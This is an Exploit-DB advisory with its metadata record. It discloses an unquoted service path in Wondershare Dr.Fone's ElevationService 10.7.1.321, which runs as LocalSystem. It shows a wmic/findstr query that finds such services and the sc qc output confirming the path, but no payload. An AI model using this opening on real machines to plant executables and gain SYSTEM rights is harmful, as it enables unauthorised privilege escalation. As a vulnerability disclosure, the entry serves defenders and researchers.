ID EDB-ID:49101
Type exploitdb
Reporter Exploit-DB
Modified 2020-11-25T00:00:00
Description
# Exploit Title: Wondershare Driver Install Service help 10.7.1.321 - 'ElevationService' Unquote Service Path
# Date: 2020-11-24
# Exploit Author: Luis Sandoval
# Vendor Homepage: https://www.wondershare.com/
# Software Link: https://www.wondershare.com/drfone/
# Version: 10.7.1.321
# Tested on: Windows 10 Home Single Language x64 Esp
# Service info:
C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
Wondershare Driver Install Service help ElevationService C:\Program Files (x86)\Wondershare\Dr.Fone\Addins\Recovery\ElevationService.exe Auto
C:\Users\user>sc qc ElevationService
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: ElevationService
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Wondershare\Dr.Fone\Addins\Recovery\ElevationService.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Wondershare Driver Install Service help
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
{"id": "EDB-ID:49101", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Wondershare Driver Install Service help 10.7.1.321 - 'ElevationService' Unquote Service Path", "description": "", "published": "2020-11-25T00:00:00", "modified": "2020-11-25T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/49101", "reporter": "Exploit-DB", "references": [], "cvelist": [], "lastseen": "2020-11-25T10:20:59", "viewCount": 532, "enchantments": {"dependencies": {"references": [], "modified": "2020-11-25T10:20:59", "rev": 2}, "score": {"value": 0.2, "vector": "NONE", "modified": "2020-11-25T10:20:59", "rev": 2}, "vulnersScore": 0.2}, "sourceHref": "https://www.exploit-db.com/download/49101", "sourceData": "# Exploit Title: Wondershare Driver Install Service help 10.7.1.321 - 'ElevationService' Unquote Service Path\r\n# Date: 2020-11-24\r\n# Exploit Author: Luis Sandoval\r\n# Vendor Homepage: https://www.wondershare.com/\r\n# Software Link: https://www.wondershare.com/drfone/\r\n# Version: 10.7.1.321\r\n# Tested on: Windows 10 Home Single Language x64 Esp\r\n\r\n# Service info:\r\n\r\nC:\\Users\\user>wmic service get name, displayname, pathname, startmode | findstr /i \"Auto\" | findstr /i /v \"C:\\Windows\\\\\" | findstr /i /v \"\"\"\r\n\r\nWondershare Driver Install Service help ElevationService C:\\Program Files (x86)\\Wondershare\\Dr.Fone\\Addins\\Recovery\\ElevationService.exe Auto\r\n\r\nC:\\Users\\user>sc qc ElevationService\r\n[SC] QueryServiceConfig CORRECTO\r\n\r\nNOMBRE_SERVICIO: ElevationService\r\n TIPO : 10 WIN32_OWN_PROCESS\r\n TIPO_INICIO : 2 AUTO_START\r\n CONTROL_ERROR : 1 NORMAL\r\n NOMBRE_RUTA_BINARIO: C:\\Program Files (x86)\\Wondershare\\Dr.Fone\\Addins\\Recovery\\ElevationService.exe\r\n GRUPO_ORDEN_CARGA :\r\n ETIQUETA : 0\r\n NOMBRE_MOSTRAR : Wondershare Driver Install Service help\r\n DEPENDENCIAS :\r\n NOMBRE_INICIO_SERVICIO: LocalSystem", "osvdbidlist": []}
{}